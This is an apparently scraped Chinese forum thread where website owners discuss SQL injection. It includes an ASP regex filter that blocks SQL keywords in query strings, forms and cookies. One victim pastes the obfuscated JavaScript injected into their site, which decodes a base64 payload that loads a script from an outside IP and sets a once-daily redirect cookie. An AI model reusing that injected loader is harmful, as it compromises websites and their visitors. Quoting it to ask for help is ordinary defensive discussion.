试试这个,一般是cookies注入,如果你asp中直接Request("id")的话,没有过滤cookies就会被注入了
Response.Buffer = True '缓存页面
'防范get注入
If Request.QueryString <> "" Then
call StopInjection(Request.QueryString,"QueryString")
End if
'防范post注入
If Request.Form <> "" Then
call StopInjection(Request.Form,"Form")
End if
'防范cookies注入
If Request.Cookies <> "" Then
call StopInjection(Request.Cookies,"Cookies")
End if
'正则子函数
Function StopInjection(Values,Rtype)
Dim regEx
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "'|;|#|([\s\b+()]+(select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|set|exists)[\s\b+]*|varchar)"
Dim sItem, sValue
For Each sItem In Values
sValue = LCase(Values(sItem))
'Response.write Values &"\====\" &sValue &"
"
If regEx.Test(sValue) Then
Response.Write Rtype & "注入:" & sValue &"
"
Response.End
End If
Next
Set regEx = Nothing
End function
我现在也遇到了这个问题,数据库刚清完,他就又写进去了。
服务器上防火墙,杀毒软件都正常,网站页面都有防注入代码。
希望有知道注入方式的人来指点一下。
我的站被植入以下一段
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
不知道哪个逼,盗我网站cookies,然后准备发到网页链接个网站
艹
教你批量清除网页病毒代码
恩,也遇到过,没办法,用软件把这个恶意代码替换掉吧.建议升级防火墙了.
可以用dw直接替换,ctrl+f里面个整个目录..你看一下,这个应该懂的.
内容全部来源于网络收集,如有侵权,请联系网站删除:QQ:24596024